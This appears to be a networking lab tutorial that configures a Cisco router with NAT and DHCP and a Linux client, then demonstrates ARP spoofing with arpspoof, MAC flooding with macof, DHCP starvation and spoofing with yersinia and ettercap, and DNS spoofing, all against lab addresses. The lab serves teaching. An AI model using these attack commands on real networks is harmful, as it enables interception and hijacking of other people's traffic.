# Tutorial 1 ## Physical Setup ![](./network_connection.png) ## Router Configuration - `XX`: Workplace number ```sh # Enter configuration enable configure terminal # Assign ip addresses interface gi0/0 ip address 10.3.44.1XX 255.255.255.0 ip nat outside no shutdown interface gi0/1 ip address 192.168.1.1 255.255.255.0 ip nat inside no shutdown # Enable network address translation # ip nat pool { netmask | prefix-length } [ type { rotary } ] ip nat pool okayletsgo 10.3.44.1XX 10.3.44.1XX netmask 255.255.255.0 # access-list acln {deny|permit} {host|source source-wildcard|any} access-list 24 permit 192.168.1.0 0.0.0.255 # ip nat inside source { list pool [overload] | static } ip nat inside source list 24 pool okayletsgo overload # Configure DHCP ip dhcp excluded-address 192.168.1.1 192.168.1.1 ip dhcp pool AddSomeProtein network 192.168.1.0 255.255.255.0 default-router 192.168.1.1 dns-server 208.67.222.222 exit # Enable DHCP for inner network service dhcp gi0/1 exit configure terminal # Set default gateway ip route 0.0.0.0 0.0.0.0 10.3.44.1 exit disable ``` ## Client Configuration - `X`: Workplace number ```sh sudo -i ifconfig eth0 192.168.1.1X netmask 255.255.255.0 route add default gw 192.168.1.1 echo "nameserver 208.67.222.222" > /etc/resolv.conf # watch the result using the command below ip addr show ``` ## ARP Spoofing ```sh # sudo arpspoof -i [interface] -t # Spy traffic from victim to router sudo arpspoof -i eth0 -t 192.168.1.11 192.168.1.1 # Spy traffic from router to victim sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.11 ``` ## MAC Flooding ### Switch Configuration ```sh enable clear mac address-table dynamic ``` ### Kali Linux ```sh ping 192.168.1.1 # after the ping we should have 2 Mac addresses in the table macof # after the macof we have overflow of mac addresses ``` ## DHCP Spoofing ```sh sudo -i apt install yersinia ``` ### Perform DHCP Starvation - Start yersinia-graphical - Select `Launch Attack` - Select `DHCP` - Select sending `DISCOVER packet` - Select `Ok` - Open ettercap-graphical - Go to MITM menu - Select `DHCP Spoofing` - Set configurations - IP Pool: 192.168.1.10-192.168.1.20 - Netmask: 255.255.255.0 - ### Disable DHCP Because DHCP doesn't work on the victim machine, we need to disable it. ```sh enable configure terminal no service dhcp ``` ### On victim machine ```sh ifconfig eth0 0.0.0.0 dhclient -r dhclient eth0 ``` ## DNS Spoofing - Go to ettercap-graphical - Start a DHCP Spoofing - Select configuration as victim (192.168.1.0 255.255.255.0 1.1.1.1) - Go to Plugins - Activate `dns_spoof`